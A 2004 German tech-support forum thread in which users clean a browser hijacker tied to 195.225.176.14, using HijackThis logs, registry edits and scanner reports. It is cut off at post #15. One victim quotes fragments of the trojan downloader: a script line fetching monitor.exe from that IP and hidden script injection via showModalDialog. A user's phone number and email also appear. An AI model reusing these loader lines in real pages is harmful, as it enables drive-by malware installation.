monitor.exe ist nicht vorhandenoder verweist auf kein verzeichnis |
||
---|---|---|
#0
| ||
19.06.2004, 23:32
chrisi
zu Gast
|
||
|
||
20.06.2004, 13:52
Ehrenmitglied
Beiträge: 29434 |
#2
Lade TuneUp 2003 ...30 Tage free und checke den Comp.
http://www.tuneup.de/download/tu2003/ MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit |
|
|
||
20.06.2004, 17:27
Member
Beiträge: 13 |
#3
Liebe Sabina
Ich habe auch dieses Problem. Ich weiss aber nicht, wie ich meinen Computer mit TuneUp checken soll. Kannst Du mir da helfen bzw. gibt es da eine Telefonnummer, wo ich anrufen kann ? Zur Sache selbst : Ich habe im Start 2 Fenster. Das obige habe ich dadurch wegbekommen, indem ich in der Registry folgenden Key 'monitor' (Ergebnis der Suche nach 'monitor.exe') gelöscht habe. [HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run] Der Key 'monitor' in [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] wurde offensichtlich damit automatisch mitgelöscht, denn als ich dann das zweite Vorkommnis auch löschen wollte, war er dann nicht mehr da. Doch im Start bekomme ich noch eine zweite Meldung : ------------------------------------------------------------------------- "monitor.exe" konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen korrekt eingegeben haben und wiederholen Sie den Vorgang. Klicken Sie auf "Start" und anschliessend auf "Suchen", um eine Datei zu finden. ------------------------------------------------------------------------- Kannst Du bzw. wer kann mir da helfen. Ein monitor.exe habe ich tatsächlich in meinen Temporary Internet Files gefunden - und dort war auch ein Javascript File shscr.js, in dem die Zeile war : var GetPath="http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/dd/monitor.exe"; Das Script wurde von einem weiteren Javascript shcr_load.js aufgerufen : myiframe.document.write("<SCRIPT SRC='http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/shscr.js'><\/SCRIPT>"); Dieses Script habe ich aufgerufen gesehen in einem File inst.htm : showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://195.225.176.14/sur/bwkmwbo/aisemex/orxajhx/shcr_load.js\\'><\/script>'"; 'http://195.225.176.14 war auch eine kurze Zeit plötzlich meine Homepage. Wer ist eigentlich http://195.225.176.14 ? Kannst Du bzw. wer kann mir da helfen. Mit freundlichen Grüßen Werner |
|
|
||
20.06.2004, 18:06
chrisi
zu Gast
Themenstarter |
#4
grüß dich werner!
war bei mir genauso, das 'http://195.225.176.14 meine homepage war, und ich auch keine adressen mehr eingeben konnte, mit adaware 6.0 ging dieses problem weg, aber die meldung ist weiterhin nach dem hochfahren dort-- "der pfad monitor.exe ist nicht vorhanden oder verweist auf kein verzeichnis" gruß chrisi ps wie hast du die obige fehlermeldung wegbekommen? ich check das nicht Dieser Beitrag wurde am 20.06.2004 um 18:12 Uhr von chrisi editiert.
|
|
|
||
20.06.2004, 19:34
Member
Beiträge: 13 |
#5
Lieber Chris
Deine Fehlermeldung habe ich durch das Löschen eines Keys in der Registry wegbekommen - wie in meinem Beitrag beschrieben : --------------------------- Das obige habe ich dadurch wegbekommen, indem ich in der Registry folgenden Key 'monitor' (Ergebnis der Suche nach 'monitor.exe') gelöscht habe. [HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run] Der Key 'monitor' in [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] wurde offensichtlich damit automatisch mitgelöscht, denn als ich dann das zweite Vorkommnis auch löschen wollte, war er dann nicht mehr da. --------------------------- Nur die zweite Meldung - wie bekomme ich die weg ? Der Start meines Rechners dauert dadurch ca. 25 Sekunden länger. ------------------------------------------------------------------------- "monitor.exe" konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen korrekt eingegeben haben und wiederholen Sie den Vorgang. Klicken Sie auf "Start" und anschliessend auf "Suchen", um eine Datei zu finden. ------------------------------------------------------------------------- Und wie bekäme ich Adaware und wie müßte ich es bedienen ? Mit freundlichen Grüßen Werner |
|
|
||
20.06.2004, 20:13
chrisi
zu Gast
Themenstarter |
#6
ja werner!
ich hab es gelesen, nur ich finde es nicht in suchen und wo ist Registry? ich bin nicht so der freak, kannst du es in laiensprache mal erklären, danke! hier downloaden http://www.chip.de/downloads/c_downloads_8833064.html mit den 25 sek war bei mir genauso. gruß chrisi bedienung erlärt sich von selbst, einfach installieren und den rechner prüfen Dieser Beitrag wurde am 20.06.2004 um 20:16 Uhr von chrisi editiert.
|
|
|
||
21.06.2004, 00:33
Member
Beiträge: 13 |
#7
Lieber Chris
Besten Dank für Deinen Tip. Ich habe zwar nach dem versauten Sonntag immer noch ein flaues und ausgesprochen komisches Gefühl im Magen, aber nun ist mein Rechner auch ohne die zweite Fehlermeldung und sofort hochgekommen. Nun zu Deiner Frage : Gehe zu : Start -> Ausführen Tippe folgendes Kommando ein : regedit Damit startest Du den Registry Editor !!! In einer Baumstruktur liegt Dir hier die Windows Registry vor, bei der viele Programme Einträge hinterlassen. Gehe nun diesen Baum abwärts zu HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Run Dort habe ich einen Key 'monitor' gefunden und gelöscht (rechte Maustaste -> löschen). Wenn Du Dir noch den Wert anschaust, den der zu löschende Schlüssel hat, dann habe ich gesehen : Explorer monitor.exe Wenn Du dieses Kommando in einer Shell (Du bekommst diese mit Start -> Ausführen -> cmd) eintippst und mit RETURN abschickst, so solltest Du genau Deine Fehlermeldung in einem Fenster sehen. Gehe dann zu HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Sollte der Key da sein, dann lösche ihn ebenfalls. Es sieht danach aus, als ob Windows alles unter dem Run Schlüssel im Hochlauf startet. Ich hoffe, das war verständlich genug. Solltest Du dann noch Fragen haben, so kannst Du mich gerne unter (0175) 7210681 anrufen bzw. mir unter Werner.Voelk@t-online.de eine Mail schicken. Es würde mich auch ausgesprochen freuen, von Dir eine 'Frohbotschaft' in irgendeiner Form zu hören. Alles Gute Werner |
|
|
||
21.06.2004, 08:15
Ehrenmitglied
Beiträge: 29434 |
#8
Hallo ihr zwei,
Ladet bitte das HijackThis, scannen, save und dann ins Forum kopieren. Es sieht nach Virus und Hijacker aus. http://board.protecus.de/t9391.htm Fuer den TuneUp 2003 muss man nur seine mail eingeben und dann wird man auf die Seite weitergeleitet, wo man es laden kann. http://www.tuneup.de/download/tu2003/ MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit |
|
|
||
21.06.2004, 11:07
Member
Beiträge: 13 |
#9
Liebe Sabina
HijackThis hat mir folgendes Log ausgespuckt : --------------------------------------------------------------- Logfile of HijackThis v1.97.7 Scan saved at 10:58:00, on 21.06.2004 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\csrss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\LEXBCES.EXE C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\System32\GEARSec.exe C:\Programme\Ahead\InCD\InCDsrv.exe C:\WINDOWS\system32\LEXPPS.EXE C:\Norman\NVC\BIN\Zanda.exe C:\WINDOWS\System32\nvsvc32.exe C:\Programme\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe C:\WINDOWS\Explorer.EXE C:\NORMAN\Nvc\BIN\nipsvc.exe C:\NORMAN\Nvc\BIN\NJEEVES.EXE C:\NORMAN\Nvc\BIN\nvcoas.exe C:\NORMAN\Nvc\BIN\NVCSCHED.EXE C:\Programme\Ahead\InCD\InCD.exe C:\Programme\Gemeinsame Dateien\Microsoft Shared\Works Shared\WkUFind.exe C:\NORMAN\Nvc\BIN\ZLH.EXE C:\PROGRA~1\T-DSLS~1\SpeedMgr.exe C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis1\ToADiMon.exe C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe C:\NORMAN\Nvc\BIN\NYMSE.EXE C:\NORMAN\Nvc\BIN\NIP.EXE C:\Programme\Winamp\winampa.exe C:\Programme\PestPatrol\PPMemCheck.exe C:\Programme\PestPatrol\PPControl.exe C:\Programme\PestPatrol\CookiePatrol.exe C:\WINDOWS\System32\ctfmon.exe C:\Programme\Messenger\msmsgs.exe C:\Programme\Siemens\Gigaset WLAN Adapter 54\WLANMonitor2003.exe C:\Programme\InterVideo\Common\Bin\WinCinemaMgr.exe C:\NORMAN\Nvc\BIN\cclaw.exe C:\Programme\T-DSL SpeedManager\tsmsvc.exe C:\WINDOWS\system32\NOTEPAD.EXE C:\WINDOWS\System32\taskmgr.exe C:\Programme\Outlook Express\msimn.exe C:\Programme\Internet Explorer\IEXPLORE.EXE C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis2\kernel.exe C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis2\sc_watch.exe C:\Dokumente und Einstellungen\Werner Voelk\Lokale Einstellungen\Temporary Internet Files\Content.IE5\EHC7QXI5\HijackThis[1].exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/ R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.klettersteig.com/klett1/default.htm R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://195.225.176.14/ie R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://195.225.176.14/ie R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [InCD] C:\Programme\Ahead\InCD\InCD.exe O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Programme\Gemeinsame Dateien\Microsoft Shared\Works Shared\WkUFind.exe O4 - HKLM\..\Run: [Norman ZANDA] C:\NORMAN\Nvc\BIN\ZLH.EXE /LOAD /SPLASH O4 - HKLM\..\Run: [PinnacleDriverCheck] C:\WINDOWS\System32\PSDrvCheck.exe -CheckReg O4 - HKLM\..\Run: [T-DSL SpeedMgr] "C:\PROGRA~1\T-DSLS~1\SpeedMgr.exe" O4 - HKLM\..\Run: [ToADiMon.exe] C:\Programme\T-Online\T-Online_Software_5\Basis-Software\Basis1\ToADiMon.exe -TOnlineAutodialStart O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [WinampAgent] C:\Programme\Winamp\winampa.exe O4 - HKLM\..\Run: [PPMemCheck] C:\Programme\PestPatrol\PPMemCheck.exe O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Programme\PestPatrol\PPControl.exe O4 - HKLM\..\Run: [CookiePatrol] C:\Programme\PestPatrol\CookiePatrol.exe O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background O4 - Global Startup: Adobe Gamma Loader.lnk = ? O4 - Global Startup: Gigaset WLAN Adapter Monitor.lnk = C:\Programme\Siemens\Gigaset WLAN Adapter 54\WLANMonitor2003.exe O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Programme\InterVideo\Common\Bin\WinCinemaMgr.exe O4 - Global Startup: Microsoft Office.lnk = C:\Programme\Microsoft Office\Office10\OSA.EXE O13 - DefaultPrefix: http://195.225.176.14/pre.pl? O13 - WWW Prefix: http://195.225.176.14/pre.pl? O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/29baae4b77d3b6c2c018/netzip/RdxIE601_de.cab --------------------------------------------------------------- Die Einträge http://195.225.176.14 scheinen mir jedenfalls von meiner gestrigen Erfahrung zu sein. Wie müßte ich jetzt weiter verfahren - die Registry Einträge ändern oder löschen oder ??? Das TuneUp habe ich zwar auf meinen Rechner bekommen, aber ich weiß nicht, was ich damit anfangen bzw. wie ich es bedienen soll. Danke auch Dir für Deine Hilfe. Werner |
|
|
||
21.06.2004, 11:23
Ehrenmitglied
Beiträge: 29434 |
#10
@Werner Voelk
scanne mit dem HijackThis, dann hake an, was ich poste und \fix\ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://195.225.176.14/ie R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://195.225.176.14/ie R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ O13 - DefaultPrefix: http://195.225.176.14/pre.pl? O13 - WWW Prefix: http://195.225.176.14/pre.pl? O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe" -osboot neustarten Lade von dieser Site folgende Programme http://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html AdAware...free Saerch\Destroy CWHredder Sphjfix.exe Dann scannst du mit allen Tools ohne Internetverbindung Dann laedst du Spyhunter und scannst ebenfalls http://www.spy-bot.net/manual.asp Dann gehst du in \InternetOptionen und loescht dort die Temporäre Internetdateien # Doppelklicken Sie in der Systemsteuerung auf Internetoptionen. # Klicken Sie auf die Registerkarte Allgemein, und klicken Sie danach unter Temporäre Internetdateien auf Dateien löschen. dann lade die mwav.exe..30 Tage free.\alle Dateien scannen\ http://www.mwti.net/antivirus/free_utilities.asp poste. ob der Scanner was gefunden hat. ......................................................................................................... P.S. mit dem TuneUp kannst du das System saeubern, optimieren ...stelle immer\emfohlene Einstellungen \ein. es gibt eine Funktion...System auf Fehler ueberpruefen...Pfadfehler sind auch dabei... Du kannst auch noch den RegistryCleaner laden...30 Tage free das Tool checkt ebenfalls Pfadfehler u.a. http://www.registry-cleaner.net/bho-manager.htm Lade dann noch den Firefox als Zweit und SurfBrowser...ist hijackerfrei. Stelle eine Startseite ein und surfe nur mit ihm http://www.firebird-browser.de/ dann poste das Log noch einmal. MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit Dieser Beitrag wurde am 21.06.2004 um 11:32 Uhr von Sabina editiert.
|
|
|
||
21.06.2004, 13:52
Member
Beiträge: 13 |
#11
Liebe Sabina
Hier schicke ich die Logs, die ich bisher habe machen können (ich muß jetzt doch auch in die Arbeit ...) ------------------------------ SPhjFix ----------------------- 21.06.2004 12:13:21 SPhjFix started v1.07 21.06.2004 12:13:21 Stealth-String not found -> Programm terminated ------------------------------ CWShredder ----------------------- CWShredder v1.59.0 scan only report Please understand that a CWShredder 'Scan only' report might not be sufficient to troubleshoot an infected system. You can use HijackThis for that: http://www.merijn.org/files/hijackthis.zip http://www.spywareinfo.com/~merijn/files/hijackthis.zip Windows XP (5.01.2600 SP1) Windows dir: C:\WINDOWS Windows system dir: C:\WINDOWS\system32 AppData folder: C:\Dokumente und Einstellungen\Werner Voelk\Anwendungsdaten Username: Werner Voelk Found Hosts file: C:\WINDOWS\system32\drivers\etc\hosts (873 bytes, A) Shell Registry value: HKLM\..\WinLogon [Shell] Explorer.exe UserInit Registry value: HKLM\..\WinLogon [UserInit] C:\WINDOWS\system32\userinit.exe, Found Win.ini file: C:\WINDOWS\win.ini (575 bytes, A) Found System.ini file: C:\WINDOWS\system.ini (231 bytes, A) - END OF REPORT - ------------------------------ Search & Destroy ----------------------- MediaPlex: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) Advertising.com: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) Advertising.com: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) Alexa Related: What's related link (Datei austauschen, nothing done) C:\WINDOWS\Web\related.htm Avenue A, Inc.: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) BFast: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) Commission Junction: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) CoolWWWSearch: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) DoubleClick: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done) HKEY_USERS\S-1-5-21-5725110-295985826-3232857373-1005\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done) HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done) HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registrierungsdatenbank-Änderung, nothing done) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) HitBox: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) SpyHunter popups: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) ValueClick: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) WebTrends live: Verfolgender Cookie (Internet Explorer: Werner Voelk) (Cookie, nothing done) --- Spybot - Search && Destroy version: 1.3 --- 2004-05-12 Includes\Cookies.sbi 2004-05-12 Includes\Dialer.sbi 2004-05-12 Includes\Hijackers.sbi 2004-05-12 Includes\Keyloggers.sbi 2004-05-12 Includes\LSP.sbi 2004-05-12 Includes\Malware.sbi 2004-05-12 Includes\Revision.sbi 2004-05-12 Includes\Security.sbi 2004-05-12 Includes\Spybots.sbi 2004-05-12 Includes\Tracks.uti 2004-05-12 Includes\Trojans.sbi ------------------------------ Spyhunter ----------------------- Hat nichts gefunden. ------------------------------ mwav.exe (EScan AntiVirus (4.2.4) ----------------------- File C:\Dokumente und Einstellungen\Werner Voelk\Eigene Dateien\Hilfe\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed. File C:\Dokumente und Einstellungen\Werner Voelk\Eigene Dateien\Hilfe\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted. File C:\Programme\Pinnacle\Studio 8\OEM\hfx46studiosilent.exe tagged as not-a-virus:Tool.Win32.Reboot. No Action Taken. File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc77\Content.IE5\I5WV6TE5\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed. File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc77\Content.IE5\U5CXCLCV\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted. File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc78\Content.IE5\I5WV6TE5\arc[1].htm infected by "Exploit.HTML.Mht" Virus. Action Taken: File Renamed. File C:\RECYCLER\S-1-5-21-5725110-295985826-3232857373-1005\Dc78\Content.IE5\U5CXCLCV\shcr_load[1].js infected by "TrojanDownloader.JS.Small.d" Virus. Action Taken: File Deleted. ------------------------------ ------------ ----------------------- Mit TuneUp bin ich da nicht so ganz klargekommen. Eine Funktion 'System auf Fehler ueberpruefen' habe ich nicht gesehen - oder meinst Du die Funktionen DiskCleaner und RegistryCleaner. Kannst Du aus diesen Logs etwas sehen ? Herzlichen Dank Werner |
|
|
||
21.06.2004, 16:32
Ehrenmitglied
Beiträge: 29434 |
#12
@Werner Voelk
Ich sehe, dass die mwav.exe ziemlich viele Viren geloescht hat. Besteht dein anfaengliches Problem noch immer?? SystemOptimizer,Carryout a Quick..... heisst die Funktion beim TuneUp. Natuerlich kannst du auch die anderen Funktionen anwenden. MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit Dieser Beitrag wurde am 21.06.2004 um 16:59 Uhr von Sabina editiert.
|
|
|
||
21.06.2004, 16:37
Ehrenmitglied
Beiträge: 29434 |
#13
@chrisi, entschuldige, ich hatte dein Log nicht genau durchgearbeitet....
Fixe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/ O4 - HKCU\..\Run: [monitor] Explorer.exe monitor.exe neustarten gehe in den abgesicherten Modus loesche die Explorer.exe monitor.exe in der Registry und unter Windows HKCU\Microsoft\Windows\CurrentVersion\Run normal neustarten scanne mit mwav.exe...30 Tage free http://www.mwti.net/antivirus/free_utilities.asp Scanne mit AdAware free http://www.lavasoft.de/ Lade SpyHunter http://www.spy-bot.net/manual.asp loesche die TemporaryInternetFiles und dann poste, ob wieder alles funktioniert. MfG Sabina __________ MfG Sabina rund um die PC-Sicherheit Dieser Beitrag wurde am 21.06.2004 um 16:45 Uhr von Sabina editiert.
|
|
|
||
21.06.2004, 18:26
chrisi
zu Gast
Themenstarter |
#14
konkret gut sabina!
habe heute im büro nochmal gefragt die hatten mir auch geholfen, und auch nochmal danke an werner (gut das es hier sowas gibt jeder hilft jedem). ab heute hab ich ne firewall mal drauf gemacht. echt ätzend was man sich so einfangen kann. gruß chrisi an sabina an sabina, nun mein log nachdem ich im registry die exe gelöscht habe!? muss ich nun noch etwas machen? weil du doch meintest ich solle was fixen? Logfile of HijackThis v1.97.7 Scan saved at 18:52:27, on 21.06.2004 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\spoolsv.exe C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe C:\Programme\Norton AntiVirus\navapsvc.exe C:\WINDOWS\htpatch.exe C:\WINDOWS\SOUNDMAN.EXE C:\HP\KBD\KBD.EXE C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe C:\Programme\VERITAS Software\Update Manager\sgtray.exe C:\Programme\Winamp3\winampa.exe C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe C:\Programme\PicoZip\PicoZipTray.exe C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe C:\Programme\FinePixViewer\QuickDCF.exe C:\Programme\Messenger\msmsgs.exe C:\Programme\Internet Explorer\iexplore.exe C:\Dokumente und Einstellungen\Eigene Dateien\Software\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.de/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/ R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/ O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE O4 - HKLM\..\Run: [ATIPTA] C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe O4 - HKLM\..\Run: [StorageGuard] "C:\Programme\VERITAS Software\Update Manager\sgtray.exe" /r O4 - HKLM\..\Run: [WinampAgent] "C:\Programme\Winamp3\winampa.exe" O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe" O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe" O4 - HKLM\..\Run: [REGSHAVE] C:\Programme\REGSHAVE\REGSHAVE.EXE /AUTORUN O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [PicoZip] C:\Programme\PicoZip\PicoZipTray.exe O4 - Global Startup: DSLMON.lnk = C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe O4 - Global Startup: Exif Launcher.lnk = ? O14 - IERESET.INF: START_PAGE_URL=http://de7.hpwis.com O16 - DPF: ppctlcab - http://www.pestscan.com/scanner/ppctlcab.cab O16 - DPF: {19E28AFC-EAE3-4CE5-AC83-2407B42F57C9} (MSSecurityAdvisor Class) - http://download.microsoft.com/download/0/5/c/05c905f4-dd30-427d-a3de-373c3e5552fc/msSecAdv.cab?1087508194406 O16 - DPF: {2FC9A21E-2069-4E47-8235-36318989DB13} (PPSDKActiveXScanner.MainScreen) - http://www.pestscan.com/scanner/axscanner.cab O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall-Kontrolle) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab O17 - HKLM\System\CCS\Services\Tcpip\..\{6A6A3C85-8FEA-438C-8BDF-72354B2AAE0F}: NameServer = 62.27.27.62 62.27.53.66 Dieser Beitrag wurde am 21.06.2004 um 18:54 Uhr von chrisi editiert.
|
|
|
||
21.06.2004, 19:46
Ehrenmitglied
Beiträge: 29434 |
#15
Crisi
